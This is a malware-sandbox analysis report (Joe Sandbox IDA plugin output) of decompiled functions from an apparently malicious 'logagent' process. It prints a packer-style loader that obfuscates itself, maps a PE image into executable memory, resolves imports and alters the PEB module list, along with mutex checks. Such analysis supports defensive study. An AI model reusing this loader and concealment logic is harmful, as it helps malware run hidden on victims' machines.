                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@G@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@1@@NameUserV10@V10@@
                                  • String ID:
                                  • API String ID: 3382107156-0
                                  • Opcode ID: b8e59d28f1cfdb65fc57b1756a71ba3e9b4df3560f8848897e1e7dd21217353c
                                  • Instruction ID: b94a0025ee3120f282ce46cac819fd7ffee2fdf7fe7efc1014d8e4d368efe18d
                                  • Opcode Fuzzy Hash: b8e59d28f1cfdb65fc57b1756a71ba3e9b4df3560f8848897e1e7dd21217353c
                                  • Instruction Fuzzy Hash: E301DE72C0010DEBDB01DF94DC49EDEBB7CEB48304F108062F915E2150EB75A6898FA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10541006 Relevance: 4.8, APIs: 1, Strings: 2, Instructions: 323COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 56%
                                  			E10541006(void* __eax, signed char __ebx, void* __ecx, void* __edx, void* __edi, void* __fp0) {
				signed char _t132;
				signed char* _t134;
				void* _t137;
				struct HINSTANCE__* _t139;
				void* _t144;
				void* _t145;
				void* _t150;
				intOrPtr _t152;
				intOrPtr* _t154;
				void* _t157;
				void* _t161;
				void* _t165;
				intOrPtr _t169;
				void* _t174;
				unsigned int _t176;
				void* _t178;
				void* _t179;
				unsigned int _t181;
				signed int _t183;
				signed int _t184;
				signed char _t188;
				void* _t189;
				signed int _t190;
				struct HINSTANCE__* _t194;
				intOrPtr _t196;
				intOrPtr* _t197;
				intOrPtr* _t198;
				intOrPtr _t201;
				intOrPtr* _t202;
				signed char _t204;
				signed int _t207;
				long _t209;
				void* _t210;
				signed int _t215;
				void* _t217;
				intOrPtr _t221;
				signed char _t233;
				intOrPtr _t260;
				unsigned int _t262;
				intOrPtr _t265;
				void* _t266;
				signed int _t267;
				signed int _t270;
				void* _t276;
				signed int _t277;
				void* _t278;
				void* _t280;
				void* _t283;
				void* _t287;
				void* _t290;
				intOrPtr _t293;
				void* _t294;
				void* _t295;
				struct HINSTANCE__* _t297;
				void* _t310;
				void* _t311;
				void* _t313;
				intOrPtr* _t314;
				intOrPtr* _t316;
				void* _t317;
				intOrPtr* _t320;
				void* _t326;
				intOrPtr* _t328;
				void* _t329;
				void* _t330;
				void* _t332;
				void* _t333;
				void* _t334;
				void* _t335;
				void* _t336;
				signed char _t338;
				signed int _t339;
				signed int _t340;
				signed int _t342;

				_t276 = __edi;
				_pop(_t328);
				asm("aad 0xec");
				_t132 = __ebx;
				asm("salc");
				_t233 = __edx + 0x00000001 ^  *(__ebx - 0x44bbd9bd);
				_t204 = __ecx - 1;
				_t188 = __eax - 0x562956bc;
				_t338 = _t188;
				if(_t338 == 0) {
					L9:
					_push(_t276);
					_t10 = _t233 + 0x798ced37;
					 *_t10 =  *(_t233 + 0x798ced37) | _t204;
					_t342 =  *_t10;
				} else {
					if(_t338 > 0) {
						asm("fnstenv [eax]");
						_t4 = __edi + 0x78;
						 *_t4 =  *(__edi + 0x78) ^ 0x837eb642;
						_t339 =  *_t4;
						while(1) {
							L3:
							_t233 = 0x7e;
							while(1) {
								if (_t339 <= 0) goto 0x10540fb1;
								if(_t339 <= 0) {
									goto L3;
								}
								_t6 = _t276 + 0x4482f8cc;
								 *_t6 =  *(_t276 + 0x4482f8cc) ^ 0x6a26334b;
								_t340 =  *_t6;
								if(_t340 != 0) {
									continue;
								}
								asm("xlatb");
								asm("loope 0x61");
								asm("invalid");
								_t8 = _t132;
								_t132 = _t204;
								_t204 = _t8;
								if (_t340 == 0) goto 0x10540fd6;
								L8:
								asm("salc");
								_t328 = _t328 + _t188;
								asm("int3");
								asm("xlatb");
								goto L9;
							}
						}
					}
				}
				if(_t342 >= 0) {
					goto L8;
				}
				_pop(es);
				if(_t342 < 0) {
					 *0x75FF00B9 =  *((intOrPtr*)(0x75ff00b9)) + 0xb9;
					 *0x0000003A =  *0x0000003A | _t188;
					asm("rcr ah, 0x1a");
					_t134 = 0xb9 +  *0xb9;
					_t277 = 0x21adc;
					_t188 = 0xcdad7ccc;
					L17:
					_t277 = _t277 - 4;
				} else {
					asm("rcl byte [ecx-0x39494df0], cl");
					_t134 = _t132 - 0x50;
					if(_t134 >= 0) {
						asm("pushad");
						asm("fimul dword [ecx-0x473cb54e]");
						_t134[0x38] = _t134[0x38] + _t204;
						L15();
						_t183 = 0x98f;
						_t184 = _t183 & 0xfffff000;
						 *_t328 =  *_t328 + _t184;
						 *(_t328 + 4) =  *(_t328 + 4) + _t184;
						 *((intOrPtr*)(_t328 + 8)) =  *((intOrPtr*)(_t328 + 8)) + _t184;
						E105410AC(_t184, _t233); // executed
						_t326 = 0x23034;
						_t188 = 0x23038;
						_pop(_t233);
						 *(_t328 + 4) = _t204;
						goto __eax;
					}
				}
				asm("out dx, eax");
				_t134 =  &(_t134[0x83]);
				0x39649beb();
				asm("cli");
				_t189 = _t188 + 0x3933c444;
				_t190 = _t189 + 0xbbda466c;
				asm("ror edx, 0x35");
				asm("bswap edx");
				asm("rol edx, 0x9d");
				asm("ror edx, 0xcd");
				asm("ror edx, 0xe1");
				asm("ror edx, 0x91");
				asm("bswap edx");
				asm("bswap edx");
				asm("rol edx, 0x81");
				_t188 = _t190 + 0xcd035c62 - 0x6bf50ae4 + 0x4f933205 - 0x618dddff;
				asm("rol edx, 0xea");
				asm("rol edx, 0xbc");
				asm("rol edx, 0xa6");
				_t233 = ( !( ~( !((( ~(( !(_t233 - _t277 - _t277 ^ _t277) - 0x47fa76c2 + _t189 - 0xac8e9f9d ^ _t277 ^ _t277) + _t189 + 0x5706c160 + _t190) + _t277 - _t190 ^ 0x90ae4c75 ^ _t190) - _t277 ^ 0xdb518b77) + 0xb0e45941)) + _t277 + 0xf858d7a8) ^ 0xe1a77b95) - _t277;
				 *_t134 = _t233;
				if(_t277 != 0) {
					goto L17;
				}
				E105414E2(_t134);
				_t137 =  *((intOrPtr*)( *((intOrPtr*)(_t326 + 0x10))))(_t328, 0x6e72656b, 0x32336c65, 0x6c6c642e, 0);
				_t329 = _t328 + 0x10;
				_t278 = _t137;
				_t139 =  *((intOrPtr*)( *((intOrPtr*)(_t326 + 0xc))))(_t137, _t329, 0x74726956, 0x416c6175, 0x636f6c6c, 0);
				_t330 = _t329 + 0x10;
				_t194 = _t139;
				if(_t139 != 0) {
					_t139 =  *((intOrPtr*)( *((intOrPtr*)(_t326 + 0xc))))(_t278, _t330, 0x74726956, 0x506c6175, 0x65746f72, 0x7463);
					_t332 = _t330 + 0x10;
					 *(_t326 - 0x74) = _t139;
					if(_t139 != 0) {
						_t139 =  *((intOrPtr*)( *((intOrPtr*)(_t326 + 0xc))))(_t278, _t332, 0x74726956, 0x516c6175, 0x79726575, 0);
						_t333 = _t332 + 0x10;
						 *(_t326 - 0x78) = _t139;
						if(_t139 != 0) {
							_t139 =  *((intOrPtr*)( *((intOrPtr*)(_t326 + 0xc))))(_t278, _t333, 0x61427349, 0x61655264, 0x72745064, 0);
							_t334 = _t333 + 0x10;
							 *(_t326 - 0x7c) = _t139;
							if(_t139 != 0) {
								_t280 = _t326 - 0x1f8;
								_t207 = 0x3e;
								memcpy(_t280,  *(_t326 + 8) +  *((intOrPtr*)( *(_t326 + 8) + 0x3c)), _t207 << 2);
								_t335 = _t334 + 0xc;
								_t283 = _t280;
								_t144 =  *(_t283 + 0x34);
								 *(_t326 - 4) = _t144;
								_t209 =  *(_t283 + 0x50);
								 *(_t326 - 8) = _t209;
								_t145 = VirtualAlloc(_t144, _t209, 0x3000, 0x40); // executed
								_t210 = _t209;
								if(_t145 != 0) {
									L25:
									 *(_t326 - 0xc) = _t145;
									_t310 =  *(_t326 + 8);
									memcpy(_t145, _t310,  *(_t310 +  *((intOrPtr*)(_t310 + 0x3c)) + 0x54));
									_t336 = _t335 + 0xc;
									_t311 = _t310;
									_t313 = _t311 +  *((intOrPtr*)(_t311 + 0x3c)) + 0xf8;
									do {
										_t287 = _t326 - 0x38;
										_t215 = 0xa;
										_t150 = memcpy(_t287, _t313, _t215 << 2);
										_t336 = _t336 + 0xc;
										_t290 = _t287;
										_t260 =  *((intOrPtr*)(_t290 + 0x14));
										if(_t260 != 0) {
											_t150 = memcpy( *(_t326 - 0xc) +  *((intOrPtr*)(_t290 + 0xc)),  *(_t326 + 8) + _t260,  *(_t290 + 0x10));
											_t336 = _t336 + 0xc;
											_t313 = _t313;
										}
									} while (_t150 != 1);
									_t262 =  *(_t326 - 0xc) -  *(_t326 - 4);
									if(_t262 != 0) {
										_t174 =  *(_t326 - 0xc);
										_t201 =  *((intOrPtr*)(_t174 +  *((intOrPtr*)(_t174 + 0x3c)) + 0xa0));
										if(_t201 != 0) {
											_t202 = _t201 + _t174;
											while( *((intOrPtr*)(_t202 + 4)) != 0) {
												_t176 =  *(_t202 + 8) & 0x0000ffff;
												_t320 =  *(_t326 - 0xc) +  *_t202 + (_t176 & 0x00000fff);
												_t262 = _t262;
												_t178 = (_t176 >> 0xc) - 1;
												if(_t178 != 0) {
													_t179 = _t178 - 1;
													if(_t179 != 0) {
														if(_t179 == 1) {
															 *_t320 =  *_t320 + _t262;
														}
													} else {
														_t181 = _t262 & 0x0000ffff;
														goto L37;
													}
												} else {
													_t181 = _t262 >> 0x10;
													L37:
													 *_t320 =  *_t320 + _t181;
												}
												asm("loop 0xffffffce");
												_t202 = _t202 +  *((intOrPtr*)(_t202 + 4));
											}
										}
									}
									_t217 =  *(_t326 - 0xc);
									 *((intOrPtr*)(_t326 - 0x4c)) =  *((intOrPtr*)(_t326 - 0x4c)) +  *((intOrPtr*)(_t326 - 0x50));
									_t152 =  *[fs:0x30];
									if( *((intOrPtr*)(_t326 - 0x44)) == 0) {
										 *(_t152 + 8) = _t217;
									}
									_t154 =  *((intOrPtr*)( *((intOrPtr*)(_t152 + 0xc)) + 0xc));
									_t314 = _t154;
									while( *(_t154 + 0x18) !=  *((intOrPtr*)(_t326 - 0x50)) ||  *((intOrPtr*)(_t154 + 0x1c)) !=  *((intOrPtr*)(_t326 - 0x4c)) ||  *((intOrPtr*)(_t154 + 0x20)) !=  *((intOrPtr*)(_t326 - 0x48))) {
										if( *_t154 != _t314) {
											_t154 =  *_t154;
											continue;
										}
										L50:
										_t196 =  *((intOrPtr*)(_t326 - 0x178));
										if(_t196 == 0) {
											L63:
											_t197 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
											 *((intOrPtr*)(_t326 - 0x70)) = _t197;
											do {
												_t265 =  *((intOrPtr*)(_t197 + 0x18));
												if(_t265 !=  *((intOrPtr*)(_t326 - 0x50))) {
													_t157 =  *(_t326 - 0x7c)(4, _t265);
													_t266 = _t265;
													if(_t157 == 0) {
														_t293 =  *((intOrPtr*)(_t266 +  *((intOrPtr*)(_t266 + 0x3c)) + 0x80));
														if(_t293 != 0) {
															_t294 = _t293 + _t266;
															while(1) {
																_push(_t294);
																asm("repe scasd");
																_t295 = 5;
																if(0 == 0) {
																	goto L77;
																}
																_t316 =  *((intOrPtr*)(_t295 + 0x10)) +  *((intOrPtr*)(_t197 + 0x18));
																_t161 =  *_t316 -  *((intOrPtr*)(_t326 - 0x50));
																if(_t161 < 0 || _t161 >  *((intOrPtr*)(_t326 - 0x48))) {
																	L71:
																	_t294 = _t295 + 0x14;
																	continue;
																} else {
																	 *(_t326 - 0x78)(_t316, _t326 - 0x9c, 0x1c);
																	_t165 =  *(_t326 - 0x74)( *((intOrPtr*)(_t326 - 0x9c)),  *((intOrPtr*)(_t326 - 0x90)), 4, _t326 - 0x88);
																	if(_t165 != 0) {
																		_push(_t295);
																		while(1) {
																			asm("lodsd");
																			if(_t165 == 0) {
																				break;
																			}
																			_t165 = _t165 -  *((intOrPtr*)(_t326 - 0x50)) +  *(_t326 - 0xc);
																			asm("stosd");
																		}
																		 *(_t326 - 0x74)( *((intOrPtr*)(_t326 - 0x9c)),  *((intOrPtr*)(_t326 - 0x90)),  *((intOrPtr*)(_t326 - 0x88)), _t326 - 0x84);
																		_pop(_t295);
																		goto L71;
																	}
																}
																goto L77;
															}
														}
													}
												}
												L77:
												_t197 =  *_t197;
											} while (_t197 !=  *((intOrPtr*)(_t326 - 0x70)));
											_t139 =  *((intOrPtr*)(_t326 - 0x1d0)) +  *(_t326 - 0xc);
										} else {
											_t317 =  *(_t326 - 0xc);
											_t198 = _t196 + _t317;
											while(1) {
												_t169 =  *((intOrPtr*)(_t198 + 0xc));
												if(_t169 == 0) {
													goto L63;
												}
												 *((intOrPtr*)(_t326 - 0x3c)) =  *((intOrPtr*)(_t198 + 0x10)) + _t317;
												_t221 =  *_t198;
												if(_t221 == 0) {
													_t221 =  *((intOrPtr*)(_t198 + 0x10));
												}
												 *(_t326 - 0x40) = _t221 + _t317;
												_t139 = LoadLibraryA(_t169 + _t317); // executed
												if(_t139 != 0) {
													_t297 = _t139;
													while(1) {
														_t267 =  *( *(_t326 - 0x40));
														if(_t267 == 0) {
															break;
														}
														if((_t267 & 0x80000000) == 0) {
															_t270 = _t317 + _t267 + 2;
														} else {
															_t270 = _t267 & 0x7fffffff;
														}
														 *((intOrPtr*)( *((intOrPtr*)(_t326 - 0x3c)))) =  *((intOrPtr*)( *((intOrPtr*)(_t326 + 0xc))))(_t297, _t270);
														 *((intOrPtr*)(_t326 - 0x3c)) =  *((intOrPtr*)(_t326 - 0x3c)) + 4;
														 *(_t326 - 0x40) =  &(( *(_t326 - 0x40))[1]);
													}
													_t198 = _t198 + 0x14;
													continue;
												}
												goto L79;
											}
											goto L63;
										}
										goto L79;
									}
									 *(_t154 + 0x18) = _t217;
									 *((intOrPtr*)(_t154 + 0x1c)) = _t217 +  *((intOrPtr*)(_t326 - 0x1d0));
									 *((intOrPtr*)(_t154 + 0x20)) =  *((intOrPtr*)(_t326 - 0x1a8));
									goto L50;
								} else {
									_t139 = _t194->i(_t145, _t210, 0x1000, 0x40);
									if(_t139 != 0) {
										goto L25;
									}
								}
							}
						}
					}
				}
				L79:
				return _t139;
			}













































































                                  0x10541006
                                  0x1054100c
                                  0x1054100d
                                  0x1054100f
                                  0x10541010
                                  0x10541012
                                  0x10541018
                                  0x10541019
                                  0x10541019
                                  0x10541020
                                  0x1054104e
                                  0x1054104e
                                  0x1054104f
                                  0x1054104f
                                  0x1054104f
                                  0x10541022
                                  0x10541022
                                  0x10541025
                                  0x10541027
                                  0x10541027
                                  0x10541027
                                  0x1054102b
                                  0x1054102b
                                  0x1054102b
                                  0x1054102c
                                  0x1054102c
                                  0x1054102e
                                  0x00000000
                                  0x00000000
                                  0x10541030
                                  0x10541030
                                  0x10541030
                                  0x1054103a
                                  0x00000000
                                  0x00000000
                                  0x1054103c
                                  0x1054103d
                                  0x1054103f
                                  0x10541040
                                  0x10541040
                                  0x10541040
                                  0x10541041
                                  0x10541043
                                  0x10541043
                                  0x10541044
                                  0x1054104c
                                  0x1054104d
                                  0x00000000
                                  0x1054104d
                                  0x1054102c
                                  0x1054102b
                                  0x10541022
                                  0x10541055
                                  0x00000000
                                  0x00000000
                                  0x10541057
                                  0x10541058
                                  0x105410c1
                                  0x105410c7
                                  0x105410ca
                                  0x105410cd
                                  0x105410d4
                                  0x105410d9
                                  0x105410de
                                  0x105410de
                                  0x1054105a
                                  0x1054105e
                                  0x10541064
                                  0x10541066
                                  0x10541068
                                  0x10541069
                                  0x10541070
                                  0x10541080
                                  0x10541085
                                  0x10541086
                                  0x1054108b
                                  0x1054108e
                                  0x10541092
                                  0x10541096
                                  0x1054109d
                                  0x105410a1
                                  0x105410a2
                                  0x105410a6
                                  0x105410aa
                                  0x105410aa
                                  0x10541066
                                  0x105410df
                                  0x105410e0
                                  0x105410e2
                                  0x105410e7
                                  0x105410f6
                                  0x1054110a
                                  0x10541110
                                  0x1054111d
                                  0x1054111f
                                  0x10541122
                                  0x10541125
                                  0x1054112a
                                  0x10541143
                                  0x10541147
                                  0x10541155
                                  0x1054115e
                                  0x10541168
                                  0x10541173
                                  0x10541176
                                  0x10541181
                                  0x10541183
                                  0x10541187
                                  0x00000000
                                  0x00000000
                                  0x1054118d
                                  0x105411a7
                                  0x105411a9
                                  0x105411ac
                                  0x105411c4
                                  0x105411c6
                                  0x105411c9
                                  0x105411cd
                                  0x105411ec
                                  0x105411ee
                                  0x105411f1
                                  0x105411f6
                                  0x10541212
                                  0x10541214
                                  0x10541217
                                  0x1054121c
                                  0x10541238
                                  0x1054123a
                                  0x1054123d
                                  0x10541242
                                  0x10541248
                                  0x10541257
                                  0x10541258
                                  0x10541258
                                  0x1054125a
                                  0x1054125b
                                  0x1054125e
                                  0x10541261
                                  0x10541264
                                  0x10541271
                                  0x10541273
                                  0x10541276
                                  0x1054128b
                                  0x1054128b
                                  0x10541290
                                  0x1054129c
                                  0x1054129c
                                  0x1054129e
                                  0x105412a2
                                  0x105412b2
                                  0x105412b2
                                  0x105412b8
                                  0x105412b9
                                  0x105412b9
                                  0x105412bb
                                  0x105412bc
                                  0x105412c1
                                  0x105412d4
                                  0x105412d4
                                  0x105412d6
                                  0x105412d6
                                  0x105412d7
                                  0x105412dd
                                  0x105412e0
                                  0x105412e2
                                  0x105412ea
                                  0x105412f2
                                  0x105412f4
                                  0x105412f6
                                  0x10541305
                                  0x10541318
                                  0x1054131a
                                  0x1054131b
                                  0x1054131c
                                  0x10541325
                                  0x10541326
                                  0x10541331
                                  0x10541333
                                  0x10541333
                                  0x10541328
                                  0x10541328
                                  0x00000000
                                  0x10541328
                                  0x1054131e
                                  0x10541320
                                  0x1054132b
                                  0x1054132b
                                  0x1054132b
                                  0x10541337
                                  0x10541339
                                  0x10541339
                                  0x105412f6
                                  0x105412f2
                                  0x1054133e
                                  0x10541344
                                  0x10541347
                                  0x10541352
                                  0x10541354
                                  0x10541354
                                  0x1054135a
                                  0x1054135d
                                  0x1054135f
                                  0x10541390
                                  0x10541392
                                  0x00000000
                                  0x10541392
                                  0x10541396
                                  0x10541396
                                  0x1054139e
                                  0x1054140c
                                  0x10541416
                                  0x10541419
                                  0x1054141c
                                  0x1054141c
                                  0x10541422
                                  0x1054142c
                                  0x1054142f
                                  0x10541432
                                  0x1054143d
                                  0x10541445
                                  0x10541447
                                  0x10541449
                                  0x1054144b
                                  0x1054144f
                                  0x10541451
                                  0x10541452
                                  0x00000000
                                  0x00000000
                                  0x10541457
                                  0x1054145c
                                  0x1054145f
                                  0x10541466
                                  0x10541466
                                  0x00000000
                                  0x1054146b
                                  0x10541475
                                  0x1054148d
                                  0x10541492
                                  0x10541494
                                  0x10541497
                                  0x10541497
                                  0x1054149a
                                  0x00000000
                                  0x00000000
                                  0x1054149f
                                  0x105414a2
                                  0x105414a2
                                  0x105414be
                                  0x105414c1
                                  0x00000000
                                  0x105414c1
                                  0x10541492
                                  0x00000000
                                  0x1054145f
                                  0x10541449
                                  0x10541445
                                  0x10541432
                                  0x105414c4
                                  0x105414c4
                                  0x105414c6
                                  0x105414d5
                                  0x105413a0
                                  0x105413a0
                                  0x105413a3
                                  0x105413a5
                                  0x105413a5
                                  0x105413aa
                                  0x00000000
                                  0x00000000
                                  0x105413b1
                                  0x105413b4
                                  0x105413b8
                                  0x105413ba
                                  0x105413ba
                                  0x105413bf
                                  0x105413c8
                                  0x105413cc
                                  0x105413d2
                                  0x105413d4
                                  0x105413d7
                                  0x105413db
                                  0x00000000
                                  0x00000000
                                  0x105413e3
                                  0x105413f0
                                  0x105413e5
                                  0x105413e5
                                  0x105413e5
                                  0x105413fb
                                  0x105413fd
                                  0x10541401
                                  0x10541401
                                  0x10541407
                                  0x00000000
                                  0x10541407
                                  0x00000000
                                  0x105413cc
                                  0x00000000
                                  0x105413a5
                                  0x00000000
                                  0x1054139e
                                  0x10541377
                                  0x10541380
                                  0x10541389
                                  0x00000000
                                  0x10541278
                                  0x10541281
                                  0x10541285
                                  0x00000000
                                  0x00000000
                                  0x10541285
                                  0x10541276
                                  0x10541242
                                  0x1054121c
                                  0x105411f6
                                  0x105414d8
                                  0x105414df

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: &$K3&j
                                  • API String ID: 0-1358381531
                                  • Opcode ID: b23318fcd0f3d4be8cd8f0fbba66d9fc3a7c1fe41525f9fd7f26b4cfe6c209f9
                                  • Instruction ID: 3b9bfa2e29cd1dc1ab26d355f884f667220e9251882b67b2ca1ecdbc9175d6ac
                                  • Opcode Fuzzy Hash: b23318fcd0f3d4be8cd8f0fbba66d9fc3a7c1fe41525f9fd7f26b4cfe6c209f9
                                  • Instruction Fuzzy Hash: 64911731B052416FD700CF7ACC88ADA7F66EFC1260B29C269E854DF699E770A905C754
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 105410AC Relevance: 3.4, APIs: 2, Instructions: 382memorylibraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAlloc.KERNELBASE(?,?,00003000,00000040,?,?,?,?,00000000,?,?,?,00000000), ref: 10541271
                                  • LoadLibraryA.KERNELBASE(00000000,?,?,00000000,?,?,?,00000000,?,?,?,00007463,?,?,?,00000000), ref: 105413C8
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocLibraryLoadVirtual
                                  • String ID:
                                  • API String ID: 3550616410-0
                                  • Opcode ID: 2e8b3f7192a4139205fe230969fd982786794dc2622a0623c7a6f820bc3734cf
                                  • Instruction ID: 6a224fb6f10317ef31cc5b5cab7815772e7221c7f65328583c002bddea6da0c7
                                  • Opcode Fuzzy Hash: 2e8b3f7192a4139205fe230969fd982786794dc2622a0623c7a6f820bc3734cf
                                  • Instruction Fuzzy Hash: 20D18171B00205AFDB14CF69CC84BDABBB6FF84360F258559E814EB699E770AD01CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409E7D Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E00409E7D(void* __ecx, intOrPtr _a4) {
				char _v5;
				char _v8;

				GetLocaleInfoA(0x800, 0x5a,  &_v8, 3); // executed
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v8,  &_v5, __ecx);
				return _a4;
			}





                                  0x00409e8e
                                  0x00409e9f
                                  0x00409ea9

                                  APIs
                                  • GetLocaleInfoA.KERNELBASE(00000800,0000005A,00000000,00000003,0041BFB8,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.1 Pro), ref: 00409E8E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.1 Pro,0041B310,00000000,0041B310), ref: 00409E9F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@InfoLocaleU?$char_traits@
                                  • String ID:
                                  • API String ID: 4090406865-0
                                  • Opcode ID: 501cb2897031f947fe62341dcca9b5086cc5479430e65b3761638e752ef95d52
                                  • Instruction ID: 6bf4cb4ccd2def3a4df93ba3bf87f565bdd40bf68ca9332086adf1bee5c68202
                                  • Opcode Fuzzy Hash: 501cb2897031f947fe62341dcca9b5086cc5479430e65b3761638e752ef95d52
                                  • Instruction Fuzzy Hash: 80E0EC7560020DFBDB00DB90DC45ECA776CAB48745F004051BA0296190D670A7088BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00408C98 Relevance: 263.4, APIs: 134, Strings: 16, Instructions: 938synchronizationthreadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 408c98-408cf5 call 409823 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z * 2 call 4129eb call 40a154 call 4017dd 9 408cf7-408cfd 0->9 10 408d19-408d1b 9->10 11 408cff-408d01 9->11 14 408d1e-408d20 10->14 12 408d03-408d0b 11->12 13 408d15-408d17 11->13 12->10 15 408d0d-408d13 12->15 13->14 16 408d81-408e27 call 40180c ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40180c ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 call 40180c ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z call 40180c ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 14->16 17 408d22-408d7c ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z call 40180c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 14->17 15->9 15->13 29 408e72-408e8b OpenMutexA 16->29 30 408e29-408e4d ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40b4c8 16->30 23 40981c-409820 17->23 31 408ea2-408ec3 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40b4c8 29->31 32 408e8d-408e9c WaitForSingleObject CloseHandle 29->32 30->29 37 408e4f-408e6f ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40b95b call 40a906 30->37 38 408ee0-408f15 call 40180c ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ CreateMutexA GetLastError 31->38 39 408ec5-408edd ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40b95b 31->39 32->31 37->29 47 408f17-408f1a 38->47 48 408f1f-408f76 call 409908 GetModuleFileNameW call 412aeb call 40b522 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 38->48 39->38 50 409811-40981a ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 47->50 57 408f78-408f7d 48->57 58 408f7f 48->58 50->23 59 408f84-408f96 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z 57->59 58->59 60 408f98-408f9a 59->60 61 408f9f-408fa2 59->61 60->61 62 408fa4-408fb7 call 40180c ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 61->62 63 40900f-409022 call 40180c ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 61->63 62->63 71 408fb9-408fbf 62->71 69 409024 call 40a0e1 63->69 70 409029-4090b7 call 40180c call 412881 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ call 40180c ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40180c ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40180c ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40180c ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 63->70 69->70 95 40914d-409150 70->95 96 4090bd-4090ef call 40180c call 412881 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ wcslen 